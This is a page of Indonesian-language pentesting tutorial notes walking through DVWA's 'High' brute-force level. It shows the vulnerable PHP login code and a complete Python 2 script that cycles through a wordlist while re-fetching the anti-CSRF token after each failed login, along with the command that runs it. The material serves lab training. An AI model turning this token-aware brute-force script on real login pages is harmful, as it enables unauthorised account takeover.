📃
Anggi's Notes
  • Tentang Penulis
  • Preambule
  • Tutorial Red Team Area (General)
    • Tutorial Setup VirtualBox
    • Tutorial Setup Kali Linux pada VirtualBox
    • Network Adapter Type pada Virtual Box
    • Tutorial Port Forwarding Pada Virtual Box
    • Mempercepat update/upgrade/install Kali Linux
    • Networking in a Nutshell
    • Linux in A Nutshell
    • Linux Command Intro
    • VA-PT Cheatsheet
    • Penetration Testing Guide & Checklist
    • Pentesting Web checklist
    • NMAP Cheatsheet
    • Bind vs Reverse Shell Concept
    • Reverse Shell Cheatsheet
    • Linux TTY Shell Cheat Sheet
    • Menaikkan Common Shell ke Meterpreter
    • Metasploit Cheatsheet
      • msfvenom
      • searchploit
    • Metasploitable-2
    • Metasploitable-3
    • Linux Privilege Escalation
      • Linux Privilege Escalation with Misconfigured /etc/passwd
      • Linux Privilege Escalation with SUID
      • Linux Privilege Escalation with Misconfigured Sudo
      • Linux Privilege Escalation with MSF
    • DVWA
      • Brute Force
        • Low
        • Medium
        • High
      • Command Injection
        • Low
        • Medium
        • High
      • Local File Inclusion
        • Low
        • Medium
        • High
      • File Upload Vulnerability
        • Low
        • Medium
        • High
      • Cross Site Scripting (XSS)
        • Reflected
          • Low
          • Medium
          • High
        • Stored
          • Low
          • Medium
          • High
        • DOM
          • Low
          • Medium
          • High
      • SQL Injection
        • Non Blind
          • Low
          • Medium
          • High
        • Blind
          • Low
          • Medium
          • High
      • CSRF
        • Low
        • Medium
        • High
    • Pentesting Report Sample
    • Tutorial Penggunaan ZAP
    • Windows VA/Audit
      • DetExploit
      • HardeningKitty
      • Tutorial Installasi OWASP ZAP pada Windows OS
    • Linux VA/Audit dengan Lynis
    • Mobile Security Framework (MobSF) Windows Docker
  • Tutorial Red Team Area (Teknik Windows Attack )
    • Reconnaissance Techniques
    • Windows Red Team Exploitation Techniques
    • Windows Red Team Defense Evasion Techniques
  • Tutorial Blue Team Area
    • Merancang SOC
    • IR Playbook
    • Blue Team Opensource Online Tools
    • Wireshark Query Cheatsheet
  • Temuan Celah Keamanan
    • LFI (Directory Traversal) di redacted.co.id
    • Kredensial Database dan Azure Leaks pada redacted.com
    • HTML Injection di Tokopedia
    • 🤪4300$ Bounty from Opensource automate recon tools, why not?
    • I hacked Mastercard 4 times? But How?
    • LFI dan RCE di aset redacted.com
    • FTPd DOS di aset redacted.co.id
    • Gitlab SSRF di redacted.com
    • Firebase Android database Takeover
    • RCE di 11 Subdomain Dell
    • SSRF di redacted.com
    • Reflected XSS di CelticPipes
    • Git Disclosure di redacted.co.id
    • Open Redirection+XSS pada Private Program Bugcrowd
    • Rails Debug Mode Enabled pada redacted.com
Powered by GitBook
On this page
  • High
  • Mendapatkan Informasi
  • Melakukan Serangan

Was this helpful?

  1. Tutorial Red Team Area (General)
  2. DVWA
  3. Brute Force

High

High

Brute Force level High on DVWA

Di bawah ini adalah source-code dari form login level high di DVWA.

vulnerabilities/brute/source/high.php

<?php
​
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
​
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
​
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );
​
    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
​
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
​
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
​
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
​
// Generate Anti-CSRF token
generateSessionToken();
​
?>

Mendapatkan Informasi

Pada level high ini, server akan melakukan validasi Anti-CSRF token terlebih dahulu. Dan jika gagal melakukan login akan terjadi delay 0-3 detik.

Singkatnya, Anti-CSRF token adalah token yang bersifat unik (setiap adanya request baru nilanya akan berubah) yang digunakan untuk memastikan user melakukan request secara resmi.

Jika kita melakukan inspect element, maka akan terlihat terdapat tag input bertipe hidden dengan nama user_token beserta nilainya.

Nilai dari token tersebut akan selalu berubah ketika kita melakukan request yang baru (coba saja anda refresh, pasti hasilnya akan berbeda).

Jika kita memaksa untuk menggunakan nilai yang sama, maka request akan gagal dilakukan dan halaman akan di-redirect ke form login kembali.

Untuk menghadapi masalah ini kita tidak bisa menggunakan Hydra lagi, karena tidak bisa mengatasi Anti-CSRF token yang selalu berubah-ubah. Oleh karena itu, kita akan melakukan brute force dengan membuat script sendiri menggunakan bahasa Python.

nano bruteforce.py

/Tulis script berikut
from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup
​
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
​
# set up our target, cookie and session
url = 'http://172.17.0.2/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'77jr5376ldag1qc392brdr2b11'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
​
''' 
checkSuccess
@param: html (String)
​
Searches the response HTML for our specified success message
'''
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)
 
 if not search:
  success = False
​
 else:
  success = True
​
# return the brute force result
 return success
​
# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
​
# Display before attack
print 'DVWA URL' + url
print 'CSRF Token='+ csrf_token
​
# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:
​
# Displays password tries and strips whitespace from password list  
  print 'password tryed: ' + password
  password = password.strip()
​
  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)
​
  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
  else:
   # Success! Show the result
   print 'Password is: ' + password
   break
​
# We failed, bummer. 
 if not success:
  print 'Brute force failed. No matches found.'

Melakukan Serangan

Pertama, kita siapkan dulu script-nya seperti berikut:

Script tersebut menggunakan Python2. Sebelum menjalankannya, pastikan dependensi telah terinstall.

sudo pip install requestssudo pip install beautifulsoup

Untuk menjalankan script tersebut, kita membutuhkan parameter untuk nama file wordlist dan pesan sukses untuk menentukan keberhasilannya, seperti berikut:

python2.7 bruteforce.py DVWA-Wordlist.txt "Welcome to the password protected area admin"

Jika berhasil, akan muncul password yang valid seperti gambar di atas.

PreviousMediumNextCommand Injection

Last updated 3 years ago

Was this helpful?

Script tersebut saya dapatkan ketika membaca artikel .

Danny Beton